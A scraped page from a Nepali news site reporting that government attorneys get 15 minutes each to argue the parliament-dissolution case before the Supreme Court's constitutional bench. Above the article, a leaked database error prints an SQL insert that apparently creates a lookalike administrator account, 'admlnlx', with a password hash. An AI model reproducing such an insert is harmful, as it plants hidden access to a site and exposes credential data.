WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B4zwHAwkD0Vk6AYA0TSbplhq9TyJOY.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 09:36:13', '', 'admlnlx', 'admlnlx')

संसद विघटनसम्बन्धी मुद्दामा बहस गर्न आइतबारदेखि सरकारी वकिललाई १५ मिनेट समय – Gaule Khabar

संसद विघटनसम्बन्धी मुद्दामा बहस गर्न आइतबारदेखि सरकारी वकिललाई १५ मिनेट समय

संसद विघटनसम्बन्धी मुद्दामा बहस गर्न आइतबारदेखि सरकारी वकिललाई १५ मिनेट समय

सर्वोच्च अदालतको संवैधानिक इजलासमा  छलफल भइरहेको समय दिइएको छ ।

आइतबारको इजलासको सुरुमै संवैधानिक इजलासको नेतृत्व गरिरहेका प्रधानन्यायाधीश चोलेन्द्रशम्शेर जबराले आजदेखि सरकारी वकिललाई १५ मिनेट समय निर्धारण गरिएको बताए ।

शुक्रबारसम्म सरकार पक्षका ८ जनाले बहस गरिसकेका छन् । जसमा ७ जना सरकारी वकिल हुन् । सरकारको प्रतिरक्षामा महान्यायाधिवक्ता अग्नि खरेल, वरिष्ठ अधिवक्ता सुशील पन्त, नायव महान्यायाधिवक्ताहरु पदमप्रसाद पाण्डेय, नारायणप्रसाद पौडेल, विश्वराज कोइराला र सहन्यायाधिवक्ताहरु सञ्जीवराज रेग्मी, लोकराज बराल र खेमराज ज्ञवालीले बहस गरिसकेका छन् ।

उनीहरुका लागि समय निर्धारण गरिएको थिएन । अब सरकारी वकिलहरु नायब महान्याधिवक्ता टेकबहादुर घिमिरे, सहन्यायाधिवक्ताद्वय  श्याम भट्टराई, उद्धवप्रसाद पुडासैनी र उपन्यायाधिवक्ता दशरथ पंगेनीले बहस गर्न बाँकी छ । त्यसबाहेक प्रधानन्यायाधीशको निजी वकिलहरुले पनि बहस गर्न बाँकी छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका